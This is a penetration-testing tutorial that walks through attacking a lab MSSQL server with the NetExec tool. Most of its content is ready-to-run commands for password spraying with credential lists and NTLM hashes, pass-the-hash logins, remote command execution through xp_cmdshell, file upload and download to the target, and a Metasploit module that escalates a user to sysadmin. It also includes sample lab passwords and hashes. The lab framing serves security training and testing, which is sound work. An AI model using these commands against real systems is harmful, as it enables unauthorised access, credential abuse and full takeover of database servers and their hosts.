MSSQL for Pentester: NetExec

NetExec (nxc) is a powerful network exploitation tool developed as a modern successor to CrackMapExec (CME), which was widely used by penetration testers and red teamers. Earlier CrackMapExec was actively maintained by mpgn, after which NetExec emerged as a popular choice. In this article we are going to cover most of the parts where this tool can come in handy to automate tasks like password spraying, command execution, file upload and many more. Here we will be performing the test cases on MSSQL server using nxc tool.

Table of Contents

·      Lab Setup

·      Password spray using nxc

·      Command execution using nxc

·      File upload and download using nxc

·      Privilege escalation using nxc

·      Command execution as administrator using nxc

·      Enumeration on a different port number

·      Password spray using nxc continued

·      Conclusion

Lab Setup

Target Machine: Windows 10 (192.168.31.126)

Attacker Machine: Kali Linux (192.168.31.141)

For demonstration purposes, here we will be using the MSSQL service to show all the test cases. We have already setup the MSSQL server on the target machine and created few users for the running instance.



Password spray using nxc

In order to check for the correct credentials, we will create a dictionary of usernames as users.txt and passwords as pass.txt. Once we have the dictionaries created, we can perform the password spray attack to check for the correct username and password. We are going to perform this spray on the MSSQL server. Following will be the command to do so:

nxc mssql 192.168.31.126 -u users.txt -p pass.txt --continue-on-success | grep [+]



To perform the password spray using the local authentication, we can use the    --local-auth flag as it specifies that the authentication attempts should be made against the local accounts on the MSSQL server.

nxc mssql 192.168.31.126 -u users.txt -p pass.txt --continue-on-success --local-auth | grep [+]



If we want to perform password spray in such a way that each username should be used ony with its corresponding password from the list, then we can use the --no-bruteforce flag. If the username-password pair matches, it will proceed otherwise it will skip to the next pair without trying other possible combinations.

nxc mssql 192.168.31.126 -u users.txt -p pass.txt --continue-on-success --no-bruteforce



There are situations when we have the NTLM hashes instead of the passwords so we can use the nxc to perform the password spray using the hash by giving the -H flag.

nxc mssql 192.168.31.126 -u users.txt -H 64FBAE31CC352FC26AF97CBDEF151E03 --continue-on-success | grep [+]



We can use two methods to authenticate to MSSQL i.e., windows or local, the default authentication is windows. To use local authentication, add the following flag --local-auth in the command. Here we are trying to perform the local authentication as sa user.

nxc mssql 192.168.31.126 -u sa -p 'Password@123' --local-auth



As mentioned previously, we can also test for the windows authentication. Since the default mode is set to windows authentication, hence we don’t need to give any authentication flag to perform windows authentication.

nxc mssql 192.168.31.126 -u administrator -p 'Ignite@987'



Command execution using nxc

We can use nxc to query the database, by giving -q flag and then mentioning the database query. The command to do so will be:

nxc mssql 192.168.31.126 -u sa -p 'Password@123' --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;'




In order to perform the system level commands, we can use the -x flag which uses the MSSQL xp_cmdshell to execute the commands. We can use both windows and local authentication here depending on our need.

nxc mssql 192.168.31.126 -u sa -p 'Password@123' --local-auth -x ipconfig

nxc mssql 192.168.31.126 -u administrator -p 'Ignite@987' -x ipconfig





File upload and download using nxc

We can also upload the file into the target system using nxc by giving the --put-file flag which will take the filename and we will also mention the path where the file needs to uploaded.

nxc mssql 192.168.31.126 -u administrator -p 'Ignite@987' --put-file file.txt C:\\Windows\\Temp\\file.txt



It can be seen that the file has been successfully uploaded at the required path.



Similarly, we can also download the file using the --get-file flag. Here we need to mention the complete path of the file which needs to be download and also the path where the file needs to be placed at our end.

nxc mssql 192.168.31.126 -u administrator -p 'Ignite@987' --get-file C:\\Windows\\Temp\\file.txt /tmp/file.txt



Privilege escalation using nxc

Here we are going to check if the current user is allowed to perform privilege escalation or not by using the mssql_priv module of the nxc. We can explicitly mention the module name after the -M flag. Here we are going to use the raj user to check for privilege escalation. This can be used in cases where we perform the windows authentication and try for privilege escalation. The output of the command shows that the user raj can impersonate sa user. Impersonating a user means temporarily assuming the identity and privileges of that user.

nxc mssql 192.168.31.126 -u raj -p 'Password@1' -M mssql_priv



The same process can be repeated using the local authentication by adding the --local-auth flag.

nxc mssql 192.168.31.126 -u ignite -p 'Password@1' -M mssql_priv --local-auth


It can be seen that the user ignite can impersonate the user sa using local authentication, hence we will perform the privilege escalation as next step. The properties of the Ignite user can also be seen in the victim machine.

To perform privilege escalation, we will use the Metasploit framework. There is a module by the name auxiliary/admin/mssql/mssql_escalate_execute_as, which can be used to perform privilege escalation. Following will be the commands used in the module:

use auxiliary/admin/mssql/mssql_escalate_execute_as

set rhosts 192.168.31.126

set database master

set username ignite

set password Password@1

exploit

After running the exploit, it shows that the user ignite is now sysadmin. To check this, we will once again run the previously used command in nxc. The output of command shows that the user ignite is already a sysadmin. We can confirm this in the victim machine also that the user ignite is sysadmin.

 



Command execution as administrator using nxc

Let us assume that somehow we get the hash of the administrator user and we want to execute the system level commands using MSSQL, so we can use nxc to perform that. First we will check if the windows authentication is successful or not and then we can give the -x flag to perform the command execution.

nxc mssql 192.168.31.126 -u administrator -H 32196B56FFE6F45E294117B91A83BF38

nxc mssql 192.168.31.126 -u administrator -H 32196B56FFE6F45E294117B91A83BF38 -x ipconfig


Enumeration on a different port number

If the MSSQL server is running on a different port number, then also we can perform the same test cases by just mentioning the port number explicitly using --port flag.

nmap -sV -p 9070 192.168.31.126



As we can see that the MSSQL server is running on port 9070. So we can give command as follows:

nxc mssql 192.168.31.126 -u administrator -p 'Ignite@987' --port 9070



Password spray using nxc continued

Once we are ready with the list of usernames and passwords, we can perform the password spray using nxc. Here we can mention the authentication method explicitly. If no flag is used, then the authentication method will be windows authentication. Here we are using the --continue-on-success flag so that all the combinations are tried even if the successful login is obtained.

nxc mssql 192.168.31.126 -u users.txt -p pass.txt --continue-on-success



Similarly, we can perform the password spray using the local authentication.

nxc mssql 192.168.31.126 -u users.txt -p pass.txt --continue-on-success --local-auth



The above scenario clearly shows what all user accounts are used for the local authentication and windows authentication.

We can also perform the same if we have obtained a hash but we are not sure that the hash belongs to which user. Here we will be passing a list of users and giving the obtained hash value in the -H flag.

nxc mssql 192.168.31.126 -u users.txt -H 64FBAE31CC352FC26AF97CBDEF151E03 --continue-on-success



Conclusion

NetExec (nxc) stands out as a highly effective and adaptable tool for security experts, delivering advanced features for network exploitation and post-exploitation tasks. Its comprehensive functionality allows for efficient password spraying and command execution on not only MSSQL server but other services as well, making it an essential asset in both penetration testing and red teaming operations.





0 comments:

Post a Comment